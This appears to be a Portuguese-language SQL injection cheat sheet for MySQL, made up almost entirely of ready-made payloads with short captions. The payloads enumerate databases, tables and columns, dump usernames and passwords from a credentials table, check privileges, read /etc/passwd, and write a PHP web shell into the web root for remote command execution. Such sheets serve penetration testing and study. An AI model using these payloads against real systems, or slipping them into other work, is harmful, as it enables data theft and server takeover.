Exploitation
Enumeração de banco de dados
SELECT @@version
Impressão digital MySQL com saída de consulta
SELECT SLEEP(5)
Impressão digital MySQL sem saída
cn' UNION select 1,database(),2,3-- -
Nome do banco de dados atual
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
Listar todos os bancos de dados
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Listar todas as tabelas em um banco de dados específico
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Listar todas as colunas de uma tabela específica
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Despejar dados de uma tabela em outro banco de dados
Privilégios
cn' UNION SELECT 1, user(), 3, 4-- -
Encontrar usuário atual
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Descubra se o usuário tem privilégios de administrador
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
Descubra se todos os privilégios do usuário
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Descubra quais diretórios podem ser acessados através do MySQL
Injeção de arquivos
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Ler arquivo local
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Escreva uma string em um arquivo local
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Escreva um web shell no diretório base da web
Last updated